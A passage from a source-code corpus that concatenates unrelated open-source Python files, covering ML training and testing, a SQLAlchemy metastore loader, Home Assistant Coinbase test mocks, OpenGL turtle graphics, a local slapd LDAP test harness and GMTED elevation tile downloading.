result["learning_rate"] = self.optimizer.learning_rate
return result
@property
def checkpoint(self):
"""Accesses the training checkpoint."""
return self._checkpoint
@property
def training_losses(self):
"""Access training loss metric objects for all tasks."""
if self._training_losses is None:
# Builds the per-task metrics and losses.
# This the total summed training loss of tasks in the joint training.
self._training_losses = dict(
total_loss=tf.keras.metrics.Mean("training_loss", dtype=tf.float32))
for name in self.multi_task.tasks:
self._training_losses[name] = tf.keras.metrics.Mean(
"training_loss", dtype=tf.float32)
return self._training_losses
@property
def training_metrics(self):
"""Access training metric metric objects for all tasks."""
if self._training_metrics is None:
# Builds the per-task metrics and losses.
self._training_metrics = {}
for name, task in self.multi_task.tasks.items():
self._training_metrics[name] = task.build_metrics(training=True)
return self._training_metrics
@property
def strategy(self):
return self._strategy
@property
def multi_task(self):
return self._multi_task
@property
def multi_task_model(self):
return self._multi_task_model
@property
def optimizer(self):
return self._optimizer
@property
def global_step(self):
return self._global_step
def train_step(self, iterator_map):
"""The default train step calling the multi-task train step.
Args:
iterator_map: a dictionary of task names and per-task dataset iterators.
"""
def step_fn(inputs):
losses = self.multi_task.joint_train_step(
inputs,
multi_task_model=self.multi_task_model,
optimizer=self.optimizer,
task_metrics=self.training_metrics)
for key, loss in losses.items():
self.training_losses[key].update_state(loss)
self.strategy.run(
step_fn, args=(tf.nest.map_structure(next, iterator_map),))
self.global_step.assign_add(1)
|
querybook/server/lib/metastore/loaders/sqlalchemy_metastore_loader.py | shivammmmm/querybook | 1,144 | 78173 |
from typing import Dict, List, Tuple
from lib.metastore.base_metastore_loader import (
BaseMetastoreLoader,
DataTable,
DataColumn,
)
from lib.query_executor.executor_template.templates import sqlalchemy_template
from lib.query_executor.connection_string.sqlalchemy import create_sqlalchemy_engine
class SqlAlchemyMetastoreLoader(BaseMetastoreLoader):
def __init__(self, metastore_dict: Dict):
self._engine, self._inspect, self._conn = self._get_sqlalchemy(metastore_dict)
super(SqlAlchemyMetastoreLoader, self).__init__(metastore_dict)
def __del__(self):
self._conn.close()
del self._inspect
self._engine.dispose()
@classmethod
def get_metastore_params_template(cls):
return sqlalchemy_template
def get_all_schema_names(self) -> List[str]:
return self._inspect.get_schema_names()
def get_all_table_names_in_schema(self, schema_name: str) -> List[str]:
return self._inspect.get_table_names(schema=schema_name)
def get_table_and_columns(
self, schema_name, table_name
) -> Tuple[DataTable, List[DataColumn]]:
if not self._engine.dialect.has_table(
self._conn, table_name=table_name, schema=schema_name
):
return None, []
table = DataTable(
name=table_name,
type=None,
owner=None,
table_created_at=None,
table_updated_by=None,
table_updated_at=None,
data_size_bytes=None,
location=None,
partitions=None,
raw_description="",
)
raw_columns = self._inspect.get_columns(
table_name=table_name, schema=schema_name
)
columns = list(
map(
lambda col: DataColumn(
name=col["name"],
type=str(col["type"]),
comment=f"Default:{col['default']} Nullable:{col['nullable']}",
),
raw_columns,
)
)
return table, columns
def _get_sqlalchemy(self, metastore_dict):
from sqlalchemy.engine import reflection
engine = create_sqlalchemy_engine(metastore_dict["metastore_params"])
inspect = reflection.Inspector.from_engine(engine)
conn = engine.connect()
return engine, inspect, conn
|
examples/classification/plot_time_series_forest.py | jmrichardson/pyts | 1,217 | 78177 |
"""
==================
Time Series Forest
==================
This example illustrates which information is considered important
by the algorithm in order to classify time series. The index of
the most important window is retrieved via the ``feature_importances_``
and ``indices_`` attributes. The first time series for both classes
are plotted and the most important window is highlighted with a
larger line width.
It is implemented as :class:`pyts.classification.TimeSeriesForest`.
"""
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import numpy as np
from pyts.datasets import load_gunpoint
from pyts.classification import TimeSeriesForest
import matplotlib.pyplot as plt
X_train, X_test, y_train, y_test = load_gunpoint(return_X_y=True)
clf = TimeSeriesForest(random_state=43)
clf.fit(X_train, y_train)
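# Each window contributes three features (mean, standard deviation and slope), so dividing
# the index of the most important feature by 3 recovers the index of its window in ``indices_``.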
start_idxmax, end_idxmax = clf.indices_[
np.argmax(clf.feature_importances_) // 3]
plt.figure(figsize=(12, 5))
plt.plot(X_train[y_train == 1][0], label='First sample in class 1')
plt.plot(np.arange(start_idxmax, end_idxmax),
X_train[y_train == 1][0, start_idxmax:end_idxmax],
color='C0', lw=4)
plt.plot(X_train[y_train == 2][0], label='First sample in class 2')
plt.plot(np.arange(start_idxmax, end_idxmax),
X_train[y_train == 2][0, start_idxmax:end_idxmax],
color='C1', lw=4)
plt.legend(loc='best', fontsize=14)
plt.title('The most important window according to the feature importance '
'scores', fontsize=16)
plt.tight_layout()
plt.show()
|
tests/components/coinbase/common.py | MrDelik/core | 30,023 | 78188 |
"""Collection of helpers."""
from homeassistant.components.coinbase.const import (
CONF_CURRENCIES,
CONF_EXCHANGE_RATES,
DOMAIN,
)
from homeassistant.const import CONF_API_KEY, CONF_API_TOKEN
from .const import GOOD_EXCHANGE_RATE, GOOD_EXCHANGE_RATE_2, MOCK_ACCOUNTS_RESPONSE
from tests.common import MockConfigEntry
class MockPagination:
"""Mock pagination result."""
def __init__(self, value=None):
"""Load simple pagination for tests."""
self.next_starting_after = value
class MockGetAccounts:
"""Mock accounts with pagination."""
def __init__(self, starting_after=0):
"""Init mocked object, forced to return two at a time."""
if (target_end := starting_after + 2) >= (
max_end := len(MOCK_ACCOUNTS_RESPONSE)
):
end = max_end
self.pagination = MockPagination(value=None)
else:
end = target_end
self.pagination = MockPagination(value=target_end)
self.accounts = {
"data": MOCK_ACCOUNTS_RESPONSE[starting_after:end],
}
self.started_at = starting_after
def __getitem__(self, item):
"""Handle subscript request."""
return self.accounts[item]
def mocked_get_accounts(_, **kwargs):
"""Return simplified accounts using mock."""
return MockGetAccounts(**kwargs)
def mock_get_current_user():
"""Return a simplified mock user."""
return {
"id": "123456-abcdef",
"name": "Test User",
}
def mock_get_exchange_rates():
"""Return a heavily reduced mock list of exchange rates for testing."""
return {
"currency": "USD",
"rates": {GOOD_EXCHANGE_RATE_2: "0.109", GOOD_EXCHANGE_RATE: "0.00002"},
}
async def init_mock_coinbase(hass, currencies=None, rates=None):
"""Init Coinbase integration for testing."""
config_entry = MockConfigEntry(
domain=DOMAIN,
unique_id=None,
title="Test User",
data={CONF_API_KEY: "123456", CONF_API_TOKEN: "AbCDeF"},
options={
CONF_CURRENCIES: currencies or [],
CONF_EXCHANGE_RATES: rates or [],
},
)
config_entry.add_to_hass(hass)
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
return config_entry
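# --- Illustrative sketch (not part of the original helpers) ---
# Shows how the paginated account mock above is meant to be consumed: pages of two
# accounts are requested until ``pagination.next_starting_after`` is None.
def example_collect_mock_accounts():
    page = mocked_get_accounts(None)
    accounts = list(page["data"])
    while page.pagination.next_starting_after is not None:
        page = mocked_get_accounts(None, starting_after=page.pagination.next_starting_after)
        accounts.extend(page["data"])
    return accounts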
|
tutel/parted/backend/torch/executor.py | microsoft/tutel | 156 | 78193 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os, sys
import time
import json
import torch
import torch.distributed as dist
from tutel import system
from tutel import net as C
def warp_bwd_allreduce(data, is_param):
if is_param:
fusable_params.add(id(data))
return C.allreduce_backward(data, group=parallel_env.global_group)
return C.allreduce_backward(data, group=parallel_env.model_group)
def sharded_randn(shape, dim, dtype, requires_grad=False, is_param=False, device=None):
if device is None:
device = parallel_env.local_device
torch.manual_seed(1)
complete_tensor = torch.tensor(torch.randn(shape, dtype=dtype, device='cpu').numpy(), device=device, requires_grad=requires_grad)
if dim >= 0:
result = torch.chunk(complete_tensor, chunks=parallel_env.model_size, dim=dim)[parallel_env.model_rank].contiguous()
elif dim == -2:
numel = complete_tensor.numel()
assert numel % parallel_env.model_size == 0
result = complete_tensor.view(parallel_env.model_size, -1)[parallel_env.model_rank].contiguous()
else:
result = complete_tensor.contiguous()
if is_param:
result = torch.nn.Parameter(result * 1e-3)
result.is_param = True
if dim == -2:
result._full_shape = shape
result.is_param = True
result.dim_state = dim
return result
def init_session(group_size, group_count=1, device_type='cuda'):
global parallel_env, fusable_params
parallel_env = system.init_data_model_parallel(group_count=group_count, backend='nccl' if device_type == 'cuda' else 'gloo')
fusable_params = set()
assert parallel_env.model_size == group_size, f"This codegen is designed for distributed parallelism = {group_size}, while current session only activates {parallel_env.model_size} device.\n\nPlease retry with command: mpiexec --allow-run-as-root -host localhost -x MASTER_ADDR=localhost -x LOCAL_SIZE={group_size} {sys.executable} -m tutel.launcher.run {sys.executable} {' '.join(sys.argv)}"
def model_executor(module, is_training=True):
name = module.compute_name
model = module().to(parallel_env.local_device)
inputs = module.synthetic_inputs()
output = model(**inputs)
params = model.parameters()
verbose = int(os.environ.get('VERBOSE', '0'))
is_cuda = (parallel_env.local_device.type == 'cuda')
is_training = is_training and isinstance(output, torch.Tensor)
start_result = output.contiguous().view(-1)[0] if isinstance(output, torch.Tensor) else -1
if verbose:
sys.stderr.write('[%d] %g %g .. %g (%s)\n' % (parallel_env.model_rank, output.flatten()[0], output.flatten()[1], output.flatten()[-1], output.shape))
if is_training:
torch.manual_seed(1)
label = torch.LongTensor(output.size(0)).random_(1).to(output.device)
if params:
optimizer = torch.optim.SGD(params, lr=1e-5)
else:
optimizer = model_executor
optimizer.zero_grad = optimizer.step = lambda *x: None
def next_step():
if parallel_env.group_count > 1:
dist.barrier()
if is_cuda:
torch.cuda.synchronize(parallel_env.local_device)
t_start = time.time()
if is_training:
optimizer.zero_grad()
result = model(**inputs).contiguous()
result = torch.nn.functional.log_softmax(result.view(result.size(0), -1), dim=1)
result = torch.nn.functional.nll_loss(result, label)
if parallel_env.model_rank == 0 and verbose:
sys.stderr.write(f' Loss = {result} ({output.shape}, {label.shape})\n')
result.backward(retain_graph=True)
if parallel_env.group_count > 1:
for p in params:
if id(p) not in fusable_params:
p.grad = simple_all_reduce(p.grad, group=parallel_env.data_group)
optimizer.step()
else:
result = model(**inputs)
result = result.contiguous().view(-1)[0] if isinstance(result, torch.Tensor) else -1
if parallel_env.group_count > 1:
dist.barrier()
if is_cuda:
torch.cuda.synchronize(parallel_env.local_device)
t_stop = time.time()
step_time = t_stop - t_start
if parallel_env.model_rank == 0 and verbose:
sys.stderr.write('Result(is_training=%s) = %g, cost = %s\n' % (is_training, result, step_time))
return step_time
for i in range(5):
next_step()
average_step_time = sum([next_step() for _ in range(5)]) / 5
if parallel_env.model_rank == 0:
sys.stderr.write(' [%s] digest = %g .., time = %g\n' % (name, start_result, average_step_time))
result = json.dumps({'name': name, 'step_time': average_step_time})
if 'CONFIG_STORE_PATH' in os.environ:
with open(os.environ['CONFIG_STORE_PATH'], 'w') as fp:
fp.write(result)
print(result)
|
PyOpenGLExample/turtle.py | DazEB2/SimplePyScripts | 117 | 78194 |
import math
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
"""
Turtle drawings
Once the functions reset(), turn(), turnTo() and forw() are defined, it is possible to
program a path. In essence this is very similar to using polar coordinates relative
to the last set point, meaning you define the angle and the length over which a line
should be drawn. First an example will be given containing the full source; next we
will only focus on the display function, since the same primitives will be used.
http://www.de-brauwer.be/wiki/wikka.php?wakka=PyOpenGLTurtle
"""
curX = 0.0
curY = 0.0
angle = 0.0
def reset():
""" Reset the position to the origin """
global curX
global curY
global angle
curX = 0.0
curY = 0.0
angle = 0.0
def turnTo(deg):
""" Turn to a certain angle """
global angle
angle = deg
def turn(deg):
""" Turn a certain number of degrees """
global angle
angle += deg
def forw(len, visible):
""" Move forward over a certain distance """
global curX
global curY
tmpX = curX
tmpY = curY
curX = curX + len * math.cos(math.radians(angle))
curY = curY + len * math.sin(math.radians(angle))
if visible:
glBegin(GL_LINE_STRIP)
glVertex2f(tmpX, tmpY)
glVertex2f(curX, curY)
glEnd()
def initFun():
glClearColor(1.0, 1.0, 1.0, 0.0)
glColor3f(0.0, 0.0, 0.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(-100, 100, -100, 100)
def reshapeFun(w, h):
glViewport(0, 0, w, h)
# if w > h:
# glViewport((w-h)/2,0,h,h)
# else:
# glViewport(0,(h-w)/2,w,w)
def turtle_1():
glClear(GL_COLOR_BUFFER_BIT)
reset()
glColor3f(0.0, 0.0, 1.0)
L = 30
turnTo(0)
for i in range(0, 4):
forw(3 * L, True)
turn(90)
forw(L, True)
turn(90)
forw(L, True)
turn(90)
glFlush()
def turtle_2():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 100):
forw(length, True)
turn(60)
length += increment
glFlush()
def turtle_3():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 200):
forw(length, True)
turn(89.5)
length += increment
glFlush()
def turtle_4():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 200):
forw(length, True)
turn(-144)
length += increment
glFlush()
def turtle_5():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
length = 0
increment = 1
for i in range(0, 200):
forw(length, True)
turn(170)
length += increment
glFlush()
def turtle_6():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 10
length = L
for i in range(0, 10):
for j in range(0, 4):
forw(length, True)
turn(90)
length += L
glFlush()
def turtle_7():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 3
length = L
for i in range(0, 100):
forw(length, True)
turn(90)
length += L
glFlush()
def turtle_8():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
forw(100, True)
turn(120)
forw(100, True)
turn(120)
forw(50, True)
turn(120)
forw(50, True)
turn(-120)
forw(50, True)
turn(-120)
forw(50, True)
turn(120)
forw(50, True)
glFlush()
def turtle_9():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 50
for i in range(0, 3):
forw(L, True)
turn(-60)
forw(L, True)
turn(-120)
forw(L, True)
turn(-60)
forw(L, True)
glFlush()
def turtle_10():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(0.0, 0.0, 1.0)
reset()
L = 30
for i in range(0, 3):
forw(L, True)
turn(60)
forw(L, True)
turn(60)
forw(L, True)
turn(60)
forw(L, True)
turn(-60)
glFlush()
if __name__ == '__main__':
glutInit()
glutInitWindowSize(400, 400)
glutCreateWindow(b"Turtle")
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutDisplayFunc(turtle_1)
# glutDisplayFunc(turtle_2)
# glutDisplayFunc(turtle_3)
# glutDisplayFunc(turtle_4)
# glutDisplayFunc(turtle_5)
# glutDisplayFunc(turtle_6)
# glutDisplayFunc(turtle_7)
# glutDisplayFunc(turtle_8)
# glutDisplayFunc(turtle_9)
# glutDisplayFunc(turtle_10)
glutReshapeFunc(reshapeFun)
initFun()
glutMainLoop()
|
tests/test_model_interface/test_base_model.py | sumugit/DiCE | 527 | 78210 |
import pytest
import numpy as np
import dice_ml
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from dice_ml.utils.exception import SystemException
class TestModelClassification:
def create_sklearn_random_forest_classifier(self, X, y):
rfc = RandomForestClassifier(n_estimators=10, max_depth=4,
random_state=777)
model = rfc.fit(X, y)
return model
def test_base_model_classification(self, create_iris_data):
x_train, x_test, y_train, y_test, feature_names, classes = \
create_iris_data
trained_model = self.create_sklearn_random_forest_classifier(x_train, y_train)
diceml_model = dice_ml.Model(model=trained_model, backend='sklearn')
diceml_model.transformer.initialize_transform_func()
assert diceml_model is not None
prediction_probabilities = diceml_model.get_output(x_test)
assert prediction_probabilities.shape[0] == x_test.shape[0]
assert prediction_probabilities.shape[1] == len(classes)
predictions = diceml_model.get_output(x_test, model_score=False).reshape(-1, 1)
assert predictions.shape[0] == x_test.shape[0]
assert predictions.shape[1] == 1
assert np.all(np.unique(predictions) == np.unique(y_test))
with pytest.raises(NotImplementedError):
diceml_model.get_gradient()
assert diceml_model.get_num_output_nodes2(x_test) == len(classes)
class TestModelRegression:
def create_sklearn_random_forest_regressor(self, X, y):
rfc = RandomForestRegressor(n_estimators=10, max_depth=4,
random_state=777)
model = rfc.fit(X, y)
return model
def test_base_model_regression(self, create_boston_data):
x_train, x_test, y_train, y_test, feature_names = \
create_boston_data
trained_model = self.create_sklearn_random_forest_regressor(x_train, y_train)
diceml_model = dice_ml.Model(model=trained_model, model_type='regressor', backend='sklearn')
diceml_model.transformer.initialize_transform_func()
assert diceml_model is not None
prediction_probabilities = diceml_model.get_output(x_test).reshape(-1, 1)
assert prediction_probabilities.shape[0] == x_test.shape[0]
assert prediction_probabilities.shape[1] == 1
predictions = diceml_model.get_output(x_test, model_score=False).reshape(-1, 1)
assert predictions.shape[0] == x_test.shape[0]
assert predictions.shape[1] == 1
with pytest.raises(NotImplementedError):
diceml_model.get_gradient()
with pytest.raises(SystemException):
diceml_model.get_num_output_nodes2(x_test)
|
desktop/core/ext-py/python-ldap-2.3.13/Tests/slapd.py | kokosing/hue | 5,079 | 78211 |
"""
Utilities for starting up a test slapd server
and talking to it with ldapsearch/ldapadd.
"""
import sys, os, socket, time, subprocess, logging, base64  # base64 is used by ldapsearch() below
_log = logging.getLogger("slapd")
def quote(s):
'''Quotes the '"' and '\' characters in a string and surrounds with "..."'''
return '"' + s.replace('\\','\\\\').replace('"','\\"') + '"'
def mkdirs(path):
"""Creates the directory path unless it already exists"""
if not os.access(os.path.join(path, os.path.curdir), os.F_OK):
_log.debug("creating temp directory %s", path)
os.mkdir(path)
return path
def delete_directory_content(path):
for dirpath,dirnames,filenames in os.walk(path, topdown=False):
for n in filenames:
_log.info("remove %s", os.path.join(dirpath, n))
os.remove(os.path.join(dirpath, n))
for n in dirnames:
_log.info("rmdir %s", os.path.join(dirpath, n))
os.rmdir(os.path.join(dirpath, n))
LOCALHOST = '127.0.0.1'
def find_available_tcp_port(host=LOCALHOST):
s = socket.socket()
s.bind((host, 0))
port = s.getsockname()[1]
s.close()
_log.info("Found available port %d", port)
return port
class Slapd:
"""
Controller class for a slapd instance, OpenLDAP's server.
This class creates a temporary data store for slapd, runs it
on a private port, and initialises it with a top-level dc and
the root user.
When a reference to an instance of this class is lost, the slapd
server is shut down.
"""
_log = logging.getLogger("Slapd")
# Use /var/tmp to placate apparmour on Ubuntu:
PATH_TMPDIR = "/var/tmp/python-ldap-test"
PATH_SBINDIR = "/usr/sbin"
PATH_BINDIR = "/usr/bin"
PATH_SCHEMA_CORE = "/etc/ldap/schema/core.schema"
PATH_LDAPADD = os.path.join(PATH_BINDIR, "ldapadd")
PATH_LDAPSEARCH = os.path.join(PATH_BINDIR, "ldapsearch")
PATH_SLAPD = os.path.join(PATH_SBINDIR, "slapd")
PATH_SLAPTEST = os.path.join(PATH_SBINDIR, "slaptest")
# TODO add paths for other OSs
def check_paths(cls):
"""
Checks that the configured executable paths look valid.
If they don't, then logs warning messages (not errors).
"""
for name,path in (
("slapd", cls.PATH_SLAPD),
("ldapadd", cls.PATH_LDAPADD),
("ldapsearch", cls.PATH_LDAPSEARCH),
):
cls._log.debug("checking %s executable at %s", name, path)
if not os.access(path, os.X_OK):
cls._log.warn("cannot find %s executable at %s", name, path)
check_paths = classmethod(check_paths)
def __init__(self):
self._config = []
self._proc = None
self._port = 0
self._tmpdir = self.PATH_TMPDIR
self._dn_suffix = "dc=python-ldap,dc=org"
self._root_cn = "Manager"
self._root_password = "password"
self._slapd_debug_level = 0
# Setters
def set_port(self, port):
self._port = port
def set_dn_suffix(self, dn):
self._dn_suffix = dn
def set_root_cn(self, cn):
self._root_cn = cn
def set_root_password(self, pw):
self._root_password = pw
def set_tmpdir(self, path):
self._tmpdir = path
def set_slapd_debug_level(self, level):
self._slapd_debug_level = level
def set_debug(self):
self._log.setLevel(logging.DEBUG)
self.set_slapd_debug_level('Any')
# getters
def get_url(self):
return "ldap://%s:%d/" % self.get_address()
def get_address(self):
if self._port == 0:
self._port = find_available_tcp_port(LOCALHOST)
return (LOCALHOST, self._port)
def get_dn_suffix(self):
return self._dn_suffix
def get_root_dn(self):
return "cn=" + self._root_cn + "," + self.get_dn_suffix()
def get_root_password(self):
return self._root_password
def get_tmpdir(self):
return self._tmpdir
def __del__(self):
self.stop()
def configure(self, cfg):
"""
Appends slapd.conf configuration lines to cfg.
Also re-initializes any backing storage.
Feel free to subclass and override this method.
"""
# Global
cfg.append("include " + quote(self.PATH_SCHEMA_CORE))
cfg.append("allow bind_v2")
# Database
ldif_dir = mkdirs(os.path.join(self.get_tmpdir(), "ldif-data"))
delete_directory_content(ldif_dir) # clear it out
cfg.append("database ldif")
cfg.append("directory " + quote(ldif_dir))
cfg.append("suffix " + quote(self.get_dn_suffix()))
cfg.append("rootdn " + quote(self.get_root_dn()))
cfg.append("rootpw " + quote(self.get_root_password()))
def _write_config(self):
"""Writes the slapd.conf file out, and returns the path to it."""
path = os.path.join(self._tmpdir, "slapd.conf")
ldif_dir = mkdirs(self._tmpdir)
if os.access(path, os.F_OK):
self._log.debug("deleting existing %s", path)
os.remove(path)
self._log.debug("writing config to %s", path)
file(path, "w").writelines([line + "\n" for line in self._config])
return path
def start(self):
"""
Starts the slapd server process running, and waits for it to come up.
"""
if self._proc is None:
ok = False
config_path = None
try:
self.configure(self._config)
self._test_configuration()
self._start_slapd()
self._wait_for_slapd()
ok = True
self._log.debug("slapd ready at %s", self.get_url())
self.started()
finally:
if not ok:
if config_path:
try: os.remove(config_path)
except os.error: pass
if self._proc:
self.stop()
def _start_slapd(self):
# Spawns/forks the slapd process
config_path = self._write_config()
self._log.info("starting slapd")
self._proc = subprocess.Popen([self.PATH_SLAPD,
"-f", config_path,
"-h", self.get_url(),
"-d", str(self._slapd_debug_level),
])
self._proc_config = config_path
def _wait_for_slapd(self):
# Waits until the LDAP server socket is open, or slapd crashed
s = socket.socket()
while 1:
if self._proc.poll() is not None:
self._stopped()
raise RuntimeError("slapd exited before opening port")
try:
self._log.debug("Connecting to %s", repr(self.get_address()))
s.connect(self.get_address())
s.close()
return
except socket.error:
time.sleep(1)
def stop(self):
"""Stops the slapd server, and waits for it to terminate"""
if self._proc is not None:
self._log.debug("stopping slapd")
if hasattr(self._proc, 'terminate'):
self._proc.terminate()
else:
import posix, signal
posix.kill(self._proc.pid, signal.SIGHUP)
#time.sleep(1)
#posix.kill(self._proc.pid, signal.SIGTERM)
#posix.kill(self._proc.pid, signal.SIGKILL)
self.wait()
def restart(self):
"""
Restarts the slapd server; ERASING previous content.
Starts the server even it if isn't already running.
"""
self.stop()
self.start()
def wait(self):
"""Waits for the slapd process to terminate by itself."""
if self._proc:
self._proc.wait()
self._stopped()
def _stopped(self):
"""Called when the slapd server is known to have terminated"""
if self._proc is not None:
self._log.info("slapd terminated")
self._proc = None
try:
os.remove(self._proc_config)
except os.error:
self._log.debug("could not remove %s", self._proc_config)
def _test_configuration(self):
config_path = self._write_config()
try:
self._log.debug("testing configuration")
verboseflag = "-Q"
if self._log.isEnabledFor(logging.DEBUG):
verboseflag = "-v"
p = subprocess.Popen([
self.PATH_SLAPTEST,
verboseflag,
"-f", config_path
])
if p.wait() != 0:
raise RuntimeError("configuration test failed")
self._log.debug("configuration seems ok")
finally:
os.remove(config_path)
def ldapadd(self, ldif, extra_args=[]):
"""Runs ldapadd on this slapd instance, passing it the ldif content"""
self._log.debug("adding %s", repr(ldif))
p = subprocess.Popen([self.PATH_LDAPADD,
"-x",
"-D", self.get_root_dn(),
"-w", self.get_root_password(),
"-H", self.get_url()] + extra_args,
stdin = subprocess.PIPE, stdout=subprocess.PIPE)
p.communicate(ldif)
if p.wait() != 0:
raise RuntimeError("ldapadd process failed")
def ldapsearch(self, base=None, filter='(objectClass=*)', attrs=[],
scope='sub', extra_args=[]):
if base is None: base = self.get_dn_suffix()
self._log.debug("ldapsearch filter=%s", repr(filter))
p = subprocess.Popen([self.PATH_LDAPSEARCH,
"-x",
"-D", self.get_root_dn(),
"-w", self.get_root_password(),
"-H", self.get_url(),
"-b", base,
"-s", scope,
"-LL",
] + extra_args + [ filter ] + attrs,
stdout = subprocess.PIPE)
output = p.communicate()[0]
if p.wait() != 0:
raise RuntimeError("ldapadd process failed")
# RFC 2849: LDIF format
# unfold
lines = []
for l in output.split('\n'):
if l.startswith(' '):
lines[-1] = lines[-1] + l[1:]
elif l == '' and lines and lines[-1] == '':
pass # ignore multiple blank lines
else:
lines.append(l)
# Remove comments
lines = [l for l in lines if not l.startswith("#")]
# Remove leading version and blank line(s)
if lines and lines[0] == '': del lines[0]
if not lines or lines[0] != 'version: 1':
raise RuntimeError("expected 'version: 1', got " + repr(lines[:1]))
del lines[0]
if lines and lines[0] == '': del lines[0]
# ensure the ldif ends with a blank line (unless it is just blank)
if lines and lines[-1] != '': lines.append('')
objects = []
obj = []
for line in lines:
if line == '': # end of an object
if obj[0][0] != 'dn':
raise RuntimeError("first line not dn", repr(obj))
objects.append((obj[0][1], obj[1:]))
obj = []
else:
                attr, value = line.split(':', 1)  # split on the first colon only (RFC 2849)
if value.startswith(': '):
value = base64.decodestring(value[2:])
elif value.startswith(' '):
value = value[1:]
else:
raise RuntimeError("bad line: " + repr(line))
obj.append((attr,value))
assert obj == []
return objects
def started(self):
"""
This method is called when the LDAP server has started up and is empty.
By default, this method adds the two initial objects,
the domain object and the root user object.
"""
assert self.get_dn_suffix().startswith("dc=")
suffix_dc = self.get_dn_suffix().split(',')[0][3:]
assert self.get_root_dn().startswith("cn=")
assert self.get_root_dn().endswith("," + self.get_dn_suffix())
root_cn = self.get_root_dn().split(',')[0][3:]
self._log.debug("adding %s and %s",
self.get_dn_suffix(),
self.get_root_dn())
self.ldapadd("\n".join([
'dn: ' + self.get_dn_suffix(),
'objectClass: dcObject',
'objectClass: organization',
'dc: ' + suffix_dc,
'o: ' + suffix_dc,
'',
'dn: ' + self.get_root_dn(),
'objectClass: organizationalRole',
'cn: ' + root_cn,
''
]))
Slapd.check_paths()
if __name__ == '__main__' and sys.argv == ['run']:
logging.basicConfig(level=logging.DEBUG)
slapd = Slapd()
print("Starting slapd...")
slapd.start()
print("Contents of LDAP server follow:\n")
for dn,attrs in slapd.ldapsearch():
print("dn: " + dn)
for name,val in attrs:
print(name + ": " + val)
print("")
print(slapd.get_url())
slapd.wait()
|
joerd/source/gmted.py
|
Hivemapper/HM-colony-joerd
| 207 |
78223
|
from joerd.util import BoundingBox
import joerd.download as download
import joerd.check as check
import joerd.srs as srs
import joerd.mask as mask
from joerd.mkdir_p import mkdir_p
from shutil import copyfileobj
import os.path
import os
import requests
import logging
import re
import tempfile
import sys
import traceback
import subprocess
import glob
from osgeo import gdal
class GMTEDTile(object):
def __init__(self, parent, x, y):
self.url = parent.url
self.download_options = parent.download_options
self.base_dir = parent.base_dir
self.x = x
self.y = y
def __key(self):
return (self.x, self.y)
def __eq__(a, b):
return isinstance(b, type(a)) and \
a.__key() == b.__key()
def __hash__(self):
return hash(self.__key())
def _res(self):
return '300' if self.y == -90 else '075'
def _file_name(self):
res = self._res()
xname = "%03d%s" % (abs(self.x), "E" if self.x >= 0 else "W")
yname = "%02d%s" % (abs(self.y), "N" if self.y >= 0 else "S")
return "%(y)s%(x)s_20101117_gmted_mea%(res)s.tif" % \
dict(res=res, x=xname, y=yname)
def urls(self):
dir = "%s%03d" % ("E" if self.x >= 0 else "W", abs(self.x))
res = self._res()
dname = "/%(res)sdarcsec/mea/%(dir)s/" % dict(res=res, dir=dir)
return [self.url + dname + self._file_name()]
def verifier(self):
return check.is_gdal
def options(self):
return self.download_options
def output_file(self):
fname = self._file_name()
return os.path.join(self.base_dir, fname)
def unpack(self, store, tmp):
with store.upload_dir() as target:
mkdir_p(os.path.join(target, self.base_dir))
output_file = os.path.join(target, self.output_file())
mask.negative(tmp.name, "GTiff", output_file)
def freeze_dry(self):
return dict(type='gmted', x=self.x, y=self.y)
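# Worked example of the naming scheme above (derived from GMTEDTile's methods, not
# from external documentation): a tile at x=-120, y=30 uses resolution code '075'
# (only the y=-90 row uses '300'), so _file_name() returns
# "30N120W_20101117_gmted_mea075.tif" and urls() requests it from the
# "/075darcsec/mea/W120/" directory under the configured base URL.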
class GMTED(object):
def __init__(self, options={}):
self.num_download_threads = options.get('num_download_threads')
self.base_dir = options.get('base_dir', 'gmted')
self.url = options['url']
self.xs = options['xs']
self.ys = options['ys']
self.download_options = options
def get_index(self):
# GMTED is a static set of files - there's no need for an index, but we
# do need a directory to store stuff in.
if not os.path.isdir(self.base_dir):
os.makedirs(self.base_dir)
def existing_files(self):
for base, dirs, files in os.walk(self.base_dir):
for f in files:
if f.endswith('tif'):
yield os.path.join(base, f)
def rehydrate(self, data):
assert data.get('type') == 'gmted', \
"Unable to rehydrate %r from GMTED." % data
return GMTEDTile(self, data['x'], data['y'])
def downloads_for(self, tile):
tiles = set()
# if the tile scale is greater than 20x the GMTED scale, then there's no
# point in including GMTED, it'll be far too fine to make a difference.
# GMTED is 7.5 arc seconds at best (30 at the poles).
if tile.max_resolution() > 20 * 7.5 / 3600:
return tiles
# buffer by 0.1 degrees (48px) to grab neighbouring tiles to ensure
        # that there are no tile edge artefacts.
tile_bbox = tile.latlon_bbox().buffer(0.1)
for y in self.ys:
for x in self.xs:
bbox = BoundingBox(x, y, x + 30, y + 20)
if tile_bbox.intersects(bbox):
tiles.add(GMTEDTile(self, x, y))
return tiles
def vrts_for(self, tile):
"""
Returns a list of sets of tiles, with each list element intended as a
separate VRT for use in GDAL.
The reason for this is that GDAL doesn't do any compositing _within_
a single VRT, so if there are multiple overlapping source rasters in
the VRT, only one will be chosen. This isn't often the case - most
